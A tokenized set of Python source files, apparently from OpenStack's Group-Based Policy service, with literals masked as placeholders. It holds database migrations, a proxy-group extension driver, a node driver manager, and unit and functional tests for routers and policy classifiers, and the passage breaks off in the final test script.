<s> """<STR_LIT>""" <EOL> revision = '<STR_LIT>' <EOL> down_revision = '<STR_LIT>' <EOL> from alembic import op <EOL> from neutron . db import migration <EOL> from sqlalchemy . engine import reflection <EOL> def upgrade ( active_plugins = None , options = None ) : <EOL> inspector = reflection . Inspector . from_engine ( op . get_bind ( ) ) <EOL> unique_constraints = inspector . get_unique_constraints ( <EOL> '<STR_LIT>' ) <EOL> for constraint in unique_constraints : <EOL> if constraint [ '<STR_LIT>' ] == [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] : <EOL> with migration . remove_fks_from_table ( <EOL> '<STR_LIT>' ) : <EOL> op . drop_constraint ( constraint [ '<STR_LIT:name>' ] , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> break <EOL> def downgrade ( active_plugins = None , options = None ) : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> revision = '<STR_LIT>' <EOL> down_revision = '<STR_LIT>' <EOL> from alembic import op <EOL> import sqlalchemy as sa <EOL> def upgrade ( active_plugins = None , options = None ) : <EOL> op . create_table ( '<STR_LIT>' , <EOL> sa . Column ( '<STR_LIT>' , <EOL> sa . String ( length = <NUM_LIT> ) , <EOL> nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , <EOL> sa . String ( length = <NUM_LIT> ) , <EOL> nullable = True ) , <EOL> sa . PrimaryKeyConstraint ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> op . create_table ( '<STR_LIT>' , <EOL> sa . Column ( '<STR_LIT>' , <EOL> sa . String ( length = <NUM_LIT> ) , <EOL> nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , <EOL> sa . String ( length = <NUM_LIT> ) , <EOL> nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , <EOL> sa . String ( length = <NUM_LIT> ) , <EOL> nullable = True ) , <EOL> sa . PrimaryKeyConstraint ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) ) <EOL> def downgrade ( active_plugins = None , options = None ) : <EOL> op . drop_table ( '<STR_LIT>' ) <EOL> op . drop_table ( '<STR_LIT>' ) </s>
<s> from neutron . api . v2 import attributes <EOL> from oslo_log import log as logging <EOL> from gbpservice . neutron . db . grouppolicy . extensions import group_proxy_db as db <EOL> from gbpservice . neutron . db . grouppolicy import group_policy_db as gp_db <EOL> from gbpservice . neutron . extensions import driver_proxy_group <EOL> from gbpservice . neutron . services . grouppolicy import ( <EOL> group_policy_driver_api as api ) <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class ProxyGroupDriver ( api . ExtensionDriver ) : <EOL> _supported_extension_alias = '<STR_LIT>' <EOL> _extension_dict = driver_proxy_group . EXTENDED_ATTRIBUTES_2_0 <EOL> def initialize ( self ) : <EOL> pass <EOL> @ property <EOL> def extension_alias ( self ) : <EOL> return self . _supported_extension_alias <EOL> @ api . default_extension_behavior ( db . GroupProxyMapping ) <EOL> def process_create_policy_target_group ( self , session , data , result ) : <EOL> data = data [ '<STR_LIT>' ] <EOL> proxied = data . get ( '<STR_LIT>' ) <EOL> if attributes . is_attr_set ( proxied ) : <EOL> record = ( session . query ( db . GroupProxyMapping ) . filter_by ( <EOL> policy_target_group_id = proxied ) . first ( ) ) <EOL> if record : <EOL> if record . proxy_group_id : <EOL> raise driver_proxy_group . InvalidProxiedGroup ( <EOL> group_id = proxied ) <EOL> record . proxy_group_id = result [ '<STR_LIT:id>' ] <EOL> else : <EOL> record = db . GroupProxyMapping ( <EOL> policy_target_group_id = proxied , <EOL> proxy_group_id = result [ '<STR_LIT:id>' ] , <EOL> proxied_group_id = None ) <EOL> session . add ( record ) <EOL> if not attributes . is_attr_set ( data . get ( '<STR_LIT>' ) ) : <EOL> data [ '<STR_LIT>' ] = driver_proxy_group . DEFAULT_PROXY_TYPE <EOL> record = ( session . query ( db . GroupProxyMapping ) . filter_by ( <EOL> policy_target_group_id = result [ '<STR_LIT:id>' ] ) . one ( ) ) <EOL> record . 
proxy_type = data [ '<STR_LIT>' ] <EOL> result [ '<STR_LIT>' ] = data [ '<STR_LIT>' ] <EOL> elif attributes . is_attr_set ( data . get ( '<STR_LIT>' ) ) : <EOL> raise driver_proxy_group . ProxyTypeSetWithoutProxiedPTG ( ) <EOL> @ api . default_extension_behavior ( db . GroupProxyMapping ) <EOL> def process_update_policy_target_group ( self , session , data , result ) : <EOL> pass <EOL> @ api . default_extension_behavior ( db . GroupProxyMapping ) <EOL> def extend_policy_target_group_dict ( self , session , result ) : <EOL> pass <EOL> @ api . default_extension_behavior ( db . ProxyGatewayMapping ) <EOL> def process_create_policy_target ( self , session , data , result ) : <EOL> self . _validate_proxy_gateway ( session , data , result ) <EOL> @ api . default_extension_behavior ( db . ProxyGatewayMapping ) <EOL> def process_update_policy_target ( self , session , data , result ) : <EOL> self . _validate_proxy_gateway ( session , data , result ) <EOL> @ api . default_extension_behavior ( db . ProxyGatewayMapping ) <EOL> def extend_policy_target_dict ( self , session , result ) : <EOL> pass <EOL> def _validate_proxy_gateway ( self , session , data , result ) : <EOL> data = data [ '<STR_LIT>' ] <EOL> if data . get ( '<STR_LIT>' ) : <EOL> ptg_id = result [ '<STR_LIT>' ] <EOL> record = session . query ( db . GroupProxyMapping ) . filter_by ( <EOL> proxy_group_id = ptg_id ) . first ( ) <EOL> if not record : <EOL> raise driver_proxy_group . InvalidProxyGatewayGroup ( <EOL> group_id = ptg_id ) <EOL> @ api . default_extension_behavior ( db . ProxyIPPoolMapping ) <EOL> def process_create_l3_policy ( self , session , data , result ) : <EOL> data = data [ '<STR_LIT>' ] <EOL> gp_db . GroupPolicyDbPlugin . validate_ip_pool ( <EOL> data [ '<STR_LIT>' ] , data [ '<STR_LIT>' ] ) <EOL> gp_db . GroupPolicyDbPlugin . validate_subnet_prefix_length ( <EOL> data [ '<STR_LIT>' ] , data [ '<STR_LIT>' ] , <EOL> data [ '<STR_LIT>' ] ) <EOL> @ api . default_extension_behavior ( db . 
ProxyIPPoolMapping ) <EOL> def process_update_l3_policy ( self , session , data , result ) : <EOL> data = data [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in data : <EOL> gp_db . GroupPolicyDbPlugin . validate_subnet_prefix_length ( <EOL> result [ '<STR_LIT>' ] , data [ '<STR_LIT>' ] , <EOL> result [ '<STR_LIT>' ] ) <EOL> @ api . default_extension_behavior ( db . ProxyIPPoolMapping ) <EOL> def extend_l3_policy_dict ( self , session , result ) : <EOL> pass </s>
<s> from neutron . _i18n import _LI <EOL> from neutron . common import exceptions as n_exc <EOL> from oslo_config import cfg <EOL> from oslo_log import log as logging <EOL> import stevedore <EOL> from gbpservice . neutron . services . servicechain . plugins . ncp import config <EOL> from gbpservice . neutron . services . servicechain . plugins . ncp import model <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class NodeDriverManager ( stevedore . named . NamedExtensionManager ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . drivers = { } <EOL> self . ordered_drivers = [ ] <EOL> names = cfg . CONF . node_composition_plugin . node_drivers <EOL> LOG . info ( _LI ( "<STR_LIT>" ) , names ) <EOL> super ( NodeDriverManager , <EOL> self ) . __init__ ( <EOL> '<STR_LIT>' , names , <EOL> invoke_on_load = True , name_order = True ) <EOL> LOG . info ( _LI ( <EOL> "<STR_LIT>" ) , self . names ( ) ) <EOL> self . _register_drivers ( ) <EOL> def _register_drivers ( self ) : <EOL> """<STR_LIT>""" <EOL> for ext in self : <EOL> self . drivers [ ext . name ] = ext <EOL> self . ordered_drivers . append ( ext ) <EOL> LOG . info ( _LI ( "<STR_LIT>" ) , <EOL> [ driver . name for driver in self . ordered_drivers ] ) <EOL> def initialize ( self ) : <EOL> """<STR_LIT>""" <EOL> self . native_bulk_support = True <EOL> for driver in self . ordered_drivers : <EOL> LOG . info ( _LI ( "<STR_LIT>" ) , <EOL> driver . name ) <EOL> driver . obj . initialize ( driver . name ) <EOL> self . native_bulk_support &= getattr ( driver . obj , <EOL> '<STR_LIT>' , True ) <EOL> def schedule_deploy ( self , context ) : <EOL> """<STR_LIT>""" <EOL> for driver in self . ordered_drivers : <EOL> try : <EOL> driver . obj . validate_create ( context ) <EOL> model . set_node_owner ( context , driver . obj . name ) <EOL> return driver . obj <EOL> except n_exc . NeutronException as e : <EOL> LOG . warning ( e . 
message ) <EOL> def schedule_destroy ( self , context ) : <EOL> """<STR_LIT>""" <EOL> driver = self . get_owning_driver ( context ) <EOL> if driver : <EOL> model . unset_node_owner ( context ) <EOL> return driver <EOL> def schedule_update ( self , context ) : <EOL> """<STR_LIT>""" <EOL> driver = self . get_owning_driver ( context ) <EOL> if driver : <EOL> driver . validate_update ( context ) <EOL> return driver <EOL> def clear_node_owner ( self , context ) : <EOL> """<STR_LIT>""" <EOL> model . unset_node_owner ( context ) <EOL> def get_owning_driver ( self , context ) : <EOL> owner = model . get_node_owner ( context ) <EOL> if owner : <EOL> driver = self . drivers . get ( owner [ <NUM_LIT:0> ] . driver_name ) <EOL> return driver . obj if driver else None </s>
<s> import mock <EOL> from neutron . common import constants as q_const <EOL> from neutron . common import exceptions as n_exc <EOL> from neutron import context <EOL> from gbpservice . neutron . services . l3_router import l3_apic <EOL> from gbpservice . neutron . tests . unit . services . grouppolicy import ( <EOL> test_apic_mapping ) <EOL> TENANT = '<STR_LIT>' <EOL> ROUTER = '<STR_LIT>' <EOL> SUBNET = '<STR_LIT>' <EOL> NETWORK = '<STR_LIT>' <EOL> PORT = '<STR_LIT>' <EOL> NETWORK_NAME = '<STR_LIT>' <EOL> TEST_SEGMENT1 = '<STR_LIT>' <EOL> FLOATINGIP = '<STR_LIT>' <EOL> class TestCiscoApicL3Plugin ( test_apic_mapping . ApicMappingTestCase ) : <EOL> '''<STR_LIT>''' <EOL> def setUp ( self ) : <EOL> super ( TestCiscoApicL3Plugin , self ) . setUp ( ) <EOL> self . subnet = { '<STR_LIT>' : NETWORK , '<STR_LIT>' : TENANT } <EOL> self . port = { '<STR_LIT>' : TENANT , <EOL> '<STR_LIT>' : NETWORK , <EOL> '<STR_LIT>' : [ { '<STR_LIT>' : SUBNET } ] , <EOL> '<STR_LIT:id>' : '<STR_LIT>' } <EOL> self . interface_info = { '<STR_LIT>' : { '<STR_LIT>' : SUBNET } , <EOL> '<STR_LIT:port>' : { '<STR_LIT>' : self . port [ '<STR_LIT:id>' ] } } <EOL> self . floatingip = { '<STR_LIT:id>' : FLOATINGIP , <EOL> '<STR_LIT>' : NETWORK_NAME , <EOL> '<STR_LIT>' : PORT } <EOL> self . context = context . get_admin_context ( ) <EOL> self . context . tenant_id = TENANT <EOL> self . plugin = l3_apic . ApicGBPL3ServicePlugin ( ) <EOL> self . plugin . apic_gbp . _notify_port_update = mock . Mock ( ) <EOL> self . plugin . _core_plugin . get_ports = mock . Mock ( <EOL> return_value = [ self . port ] ) <EOL> self . plugin . _core_plugin . get_port = mock . Mock ( return_value = self . port ) <EOL> self . plugin . _core_plugin . get_subnet = mock . Mock ( <EOL> return_value = self . subnet ) <EOL> self . plugin . _core_plugin . update_port_status = mock . Mock ( ) <EOL> self . plugin . update_floatingip_status = mock . Mock ( ) <EOL> self . plugin . get_floatingip = mock . Mock ( return_value = self . 
floatingip ) <EOL> def test_reverse_on_delete ( self ) : <EOL> pass <EOL> def _check_call_list ( self , expected , observed ) : <EOL> for call in expected : <EOL> self . assertTrue ( call in observed , <EOL> msg = '<STR_LIT>' <EOL> '<STR_LIT>' % ( str ( call ) , str ( observed ) ) ) <EOL> observed . remove ( call ) <EOL> self . assertFalse ( <EOL> len ( observed ) , <EOL> msg = '<STR_LIT>' % str ( observed ) ) <EOL> def _test_add_router_interface ( self , interface_info ) : <EOL> with mock . patch ( '<STR_LIT>' <EOL> '<STR_LIT>' ) as if_mock : <EOL> if_mock . return_value = self . port <EOL> port = self . plugin . add_router_interface ( self . context , <EOL> ROUTER , interface_info ) <EOL> self . assertEqual ( port , self . port ) <EOL> test_assert = self . plugin . _core_plugin . update_port_status <EOL> test_assert . assert_called_once_with ( self . context , <EOL> self . port [ '<STR_LIT:id>' ] , q_const . PORT_STATUS_ACTIVE ) <EOL> def _test_remove_router_interface ( self , interface_info ) : <EOL> with mock . patch ( '<STR_LIT>' <EOL> '<STR_LIT>' ) as if_mock : <EOL> self . plugin . remove_router_interface ( self . context , ROUTER , <EOL> interface_info ) <EOL> self . assertEqual ( <NUM_LIT:1> , if_mock . call_count ) <EOL> def test_add_router_interface_subnet ( self ) : <EOL> self . _test_add_router_interface ( self . interface_info [ '<STR_LIT>' ] ) <EOL> def test_add_router_interface_port ( self ) : <EOL> self . _test_add_router_interface ( self . interface_info [ '<STR_LIT:port>' ] ) <EOL> def test_remove_router_interface_subnet ( self ) : <EOL> self . _test_remove_router_interface ( self . interface_info [ '<STR_LIT>' ] ) <EOL> def test_remove_router_interface_port ( self ) : <EOL> self . _test_remove_router_interface ( self . interface_info [ '<STR_LIT:port>' ] ) <EOL> def test_create_router_gateway_fails ( self ) : <EOL> with mock . patch ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> side_effect = n_exc . 
NeutronException ) : <EOL> data = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:foo>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT>' : True , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } } <EOL> self . assertRaises ( n_exc . NeutronException , <EOL> self . plugin . create_router , self . context , data ) <EOL> routers = self . plugin . get_routers ( self . context ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( routers ) ) <EOL> def test_floatingip_port_notify_on_create ( self ) : <EOL> with mock . patch ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> new = mock . Mock ( return_value = self . floatingip ) ) : <EOL> self . plugin . create_floatingip ( self . context , <EOL> { '<STR_LIT>' : self . floatingip } ) <EOL> self . plugin . apic_gbp . _notify_port_update . assert_called_once_with ( <EOL> mock . ANY , PORT ) <EOL> def test_floatingip_port_notify_on_reassociate ( self ) : <EOL> with mock . patch ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> new = mock . Mock ( return_value = self . floatingip ) ) : <EOL> new_fip = { '<STR_LIT>' : '<STR_LIT>' } <EOL> self . plugin . update_floatingip ( self . context , FLOATINGIP , <EOL> { '<STR_LIT>' : new_fip } ) <EOL> self . _check_call_list ( <EOL> [ mock . call ( mock . ANY , PORT ) , <EOL> mock . call ( mock . ANY , '<STR_LIT>' ) ] , <EOL> self . plugin . apic_gbp . _notify_port_update . call_args_list ) <EOL> def test_floatingip_port_notify_on_disassociate ( self ) : <EOL> with mock . patch ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> new = mock . Mock ( return_value = self . floatingip ) ) : <EOL> self . plugin . update_floatingip ( self . context , FLOATINGIP , <EOL> { '<STR_LIT>' : { } } ) <EOL> self . plugin . apic_gbp . _notify_port_update . assert_called_once_with ( <EOL> mock . ANY , PORT ) <EOL> def test_floatingip_port_notify_on_delete ( self ) : <EOL> with mock . patch ( '<STR_LIT>' ) : <EOL> self . plugin . delete_floatingip ( self . context , FLOATINGIP ) <EOL> self . plugin . apic_gbp . _notify_port_update . 
assert_called_once_with ( <EOL> mock . ANY , PORT ) <EOL> def test_floatingip_status ( self ) : <EOL> with mock . patch ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> new = mock . Mock ( return_value = self . floatingip ) ) : <EOL> fip = self . plugin . create_floatingip ( self . context , <EOL> { '<STR_LIT>' : self . floatingip } ) <EOL> self . plugin . update_floatingip_status . assert_called_once_with ( <EOL> mock . ANY , FLOATINGIP , q_const . FLOATINGIP_STATUS_ACTIVE ) <EOL> self . assertEqual ( q_const . FLOATINGIP_STATUS_ACTIVE , fip [ '<STR_LIT:status>' ] ) <EOL> with mock . patch ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> new = mock . Mock ( return_value = self . floatingip ) ) : <EOL> self . plugin . update_floatingip_status . reset_mock ( ) <EOL> self . floatingip . pop ( '<STR_LIT>' ) <EOL> fip = self . plugin . update_floatingip ( self . context , FLOATINGIP , <EOL> { '<STR_LIT>' : self . floatingip } ) <EOL> self . plugin . update_floatingip_status . assert_called_once_with ( <EOL> mock . ANY , FLOATINGIP , q_const . FLOATINGIP_STATUS_DOWN ) <EOL> self . assertEqual ( q_const . FLOATINGIP_STATUS_DOWN , fip [ '<STR_LIT:status>' ] ) <EOL> with mock . patch ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> new = mock . Mock ( return_value = self . floatingip ) ) : <EOL> self . plugin . update_floatingip_status . reset_mock ( ) <EOL> self . floatingip [ '<STR_LIT>' ] = PORT <EOL> fip = self . plugin . update_floatingip ( self . context , FLOATINGIP , <EOL> { '<STR_LIT>' : self . floatingip } ) <EOL> self . plugin . update_floatingip_status . assert_called_once_with ( <EOL> mock . ANY , FLOATINGIP , q_const . FLOATINGIP_STATUS_ACTIVE ) <EOL> self . assertEqual ( q_const . FLOATINGIP_STATUS_ACTIVE , fip [ '<STR_LIT:status>' ] ) </s>
<s> import commands <EOL> import logging <EOL> import os <EOL> import sys <EOL> from libs import config_libs <EOL> from libs import utils_libs <EOL> from libs import verify_libs <EOL> def main ( ) : <EOL> test = test_gbp_pc_func ( ) <EOL> if test . test_gbp_pc_func_1 ( ) == <NUM_LIT:0> : <EOL> test . cleanup ( tc_name = '<STR_LIT>' ) <EOL> if test . test_gbp_pc_func_2 ( ) == <NUM_LIT:0> : <EOL> test . cleanup ( tc_name = '<STR_LIT>' ) <EOL> if test . test_gbp_pc_func_3 ( ) == <NUM_LIT:0> : <EOL> test . cleanup ( tc_name = '<STR_LIT>' ) <EOL> if test . test_gbp_pc_func_4 ( ) == <NUM_LIT:0> : <EOL> test . cleanup ( tc_name = '<STR_LIT>' ) <EOL> test . cleanup ( ) <EOL> utils_libs . report_results ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> class test_gbp_pc_func ( object ) : <EOL> logging . basicConfig ( <EOL> format = '<STR_LIT>' , <EOL> level = logging . WARNING ) <EOL> _log = logging . getLogger ( __name__ ) <EOL> cmd = '<STR_LIT>' <EOL> commands . getoutput ( cmd ) <EOL> hdlr = logging . FileHandler ( '<STR_LIT>' ) <EOL> formatter = logging . Formatter ( '<STR_LIT>' ) <EOL> hdlr . setFormatter ( formatter ) <EOL> _log . addHandler ( hdlr ) <EOL> _log . setLevel ( logging . INFO ) <EOL> _log . setLevel ( logging . DEBUG ) <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _log . info ( <EOL> "<STR_LIT>" ) <EOL> self . gbpcfg = config_libs . Gbp_Config ( ) <EOL> self . gbpverify = verify_libs . Gbp_Verify ( ) <EOL> self . cls_name = '<STR_LIT>' <EOL> self . act_name = '<STR_LIT>' <EOL> def cleanup ( self , tc_name = '<STR_LIT>' ) : <EOL> if tc_name != '<STR_LIT>' : <EOL> self . _log . info ( '<STR_LIT>' % ( tc_name ) ) <EOL> for obj in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:action>' ] : <EOL> self . gbpcfg . gbp_del_all_anyobj ( obj ) <EOL> def test_gbp_pc_func_1 ( self ) : <EOL> self . _log . 
info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . _log . info ( <EOL> "<STR_LIT>" ) <EOL> cls_uuid = self . gbpcfg . gbp_policy_cfg_all ( <EOL> <NUM_LIT:1> , '<STR_LIT>' , self . cls_name ) <EOL> if cls_uuid != <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" % <EOL> ( cls_uuid ) ) <EOL> else : <EOL> self . _log . info ( "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> self . _log . info ( "<STR_LIT>" ) <EOL> if self . gbpverify . gbp_classif_verify ( <NUM_LIT:0> , self . cls_name , cls_uuid ) == <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> self . _log . info ( "<STR_LIT>" ) <EOL> if self . gbpverify . gbp_classif_verify ( <EOL> <NUM_LIT:1> , self . cls_name , id = cls_uuid ) == <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> self . _log . info ( "<STR_LIT>" ) <EOL> if self . gbpcfg . gbp_policy_cfg_all ( <NUM_LIT:0> , '<STR_LIT>' , self . cls_name ) : <EOL> self . _log . info ( <EOL> "<STR_LIT>" % <EOL> ( self . cls_name ) ) <EOL> else : <EOL> self . _log . info ( <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> if self . gbpverify . gbp_classif_verify ( <NUM_LIT:0> , self . cls_name , cls_uuid ) != <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> if self . gbpverify . gbp_classif_verify ( <EOL> <NUM_LIT:1> , self . cls_name , id = cls_uuid , shared = '<STR_LIT:False>' ) != <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> cls_uuid = self . gbpcfg . gbp_policy_cfg_all ( <EOL> <NUM_LIT:1> , '<STR_LIT>' , self . cls_name ) <EOL> if cls_uuid : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . _log . 
info ( "<STR_LIT>" ) <EOL> if self . gbpcfg . gbp_policy_cfg_all ( <NUM_LIT:0> , '<STR_LIT>' , cls_uuid ) : <EOL> self . _log . info ( <EOL> "<STR_LIT>" % <EOL> ( cls_uuid ) ) <EOL> else : <EOL> self . _log . info ( <EOL> "<STR_LIT>" ) <EOL> if self . gbpverify . gbp_classif_verify ( <EOL> <NUM_LIT:0> , self . cls_name , cls_uuid ) != <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> if self . gbpverify . gbp_classif_verify ( <EOL> <NUM_LIT:1> , self . cls_name , id = cls_uuid , shared = '<STR_LIT:False>' ) != <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> else : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> self . _log . info ( "<STR_LIT>" ) <EOL> def test_gbp_pc_func_2 ( self ) : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . _log . info ( <EOL> "<STR_LIT>" ) <EOL> cls_uuid = self . gbpcfg . gbp_policy_cfg_all ( <EOL> <NUM_LIT:1> , '<STR_LIT>' , self . cls_name ) <EOL> if cls_uuid != <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" % <EOL> ( cls_uuid ) ) <EOL> else : <EOL> self . _log . info ( "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if self . gbpcfg . gbp_policy_cfg_all ( <EOL> <NUM_LIT:2> , '<STR_LIT>' , cls_uuid , name = '<STR_LIT>' ) == <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> if self . gbpcfg . gbp_policy_cfg_all ( <EOL> <NUM_LIT:2> , '<STR_LIT>' , cls_uuid , protocol = '<STR_LIT>' ) == <NUM_LIT:0> : <EOL> self . _log . 
info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> if self . gbpcfg . gbp_policy_cfg_all ( <EOL> <NUM_LIT:2> , '<STR_LIT>' , cls_uuid , direction = '<STR_LIT>' ) == <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> if self . gbpcfg . gbp_policy_cfg_all ( <EOL> <NUM_LIT:2> , '<STR_LIT>' , cls_uuid , port_range = '<STR_LIT>' ) == <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> if self . gbpverify . gbp_classif_verify ( <EOL> <NUM_LIT:0> , '<STR_LIT>' , cls_uuid , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) == <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> if self . gbpverify . gbp_classif_verify ( <EOL> <NUM_LIT:1> , <EOL> '<STR_LIT>' , <EOL> id = cls_uuid , <EOL> protocol = '<STR_LIT>' , <EOL> port_range = '<STR_LIT>' , <EOL> direction = '<STR_LIT>' ) == <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> if self . gbpcfg . gbp_policy_cfg_all ( <NUM_LIT:0> , '<STR_LIT>' , cls_uuid ) : <EOL> self . _log . info ( <EOL> "<STR_LIT>" % <EOL> ( cls_uuid ) ) <EOL> else : <EOL> self . _log . info ( <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> if self . gbpverify . gbp_classif_verify ( <NUM_LIT:1> , '<STR_LIT>' , id = cls_uuid ) != <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> self . _log . info ( "<STR_LIT>" ) <EOL> def test_gbp_pc_func_3 ( self ) : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . _log . info ( <EOL> "<STR_LIT>" ) <EOL> cls_uuid = self . gbpcfg . gbp_policy_cfg_all ( <EOL> <NUM_LIT:1> , '<STR_LIT>' , self . 
cls_name ) <EOL> if cls_uuid != <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" % <EOL> ( cls_uuid ) ) <EOL> else : <EOL> self . _log . info ( "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if self . gbpcfg . gbp_policy_cfg_all ( <EOL> <NUM_LIT:2> , <EOL> '<STR_LIT>' , <EOL> cls_uuid , <EOL> name = '<STR_LIT>' , <EOL> protocol = '<STR_LIT>' , <EOL> direction = '<STR_LIT>' , <EOL> port_range = '<STR_LIT>' , <EOL> description = "<STR_LIT>" ) : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> else : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> if self . gbpverify . gbp_classif_verify ( <EOL> <NUM_LIT:0> , '<STR_LIT>' , cls_uuid , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) == <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> if self . gbpverify . gbp_classif_verify ( <EOL> <NUM_LIT:1> , <EOL> '<STR_LIT>' , <EOL> id = cls_uuid , <EOL> protocol = '<STR_LIT>' , <EOL> direction = '<STR_LIT>' , <EOL> port_range = '<STR_LIT>' , <EOL> description = '<STR_LIT>' ) == <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> if self . gbpcfg . gbp_policy_cfg_all ( <NUM_LIT:0> , '<STR_LIT>' , '<STR_LIT>' ) == <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> if self . gbpverify . gbp_classif_verify ( <NUM_LIT:1> , '<STR_LIT>' , id = cls_uuid ) != <NUM_LIT:0> : <EOL> self . _log . info ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:0> <EOL> self . _log . info ( "<STR_LIT>" ) <EOL> def test_gbp_pc_func_4 ( self ) : <EOL> self . _log . 
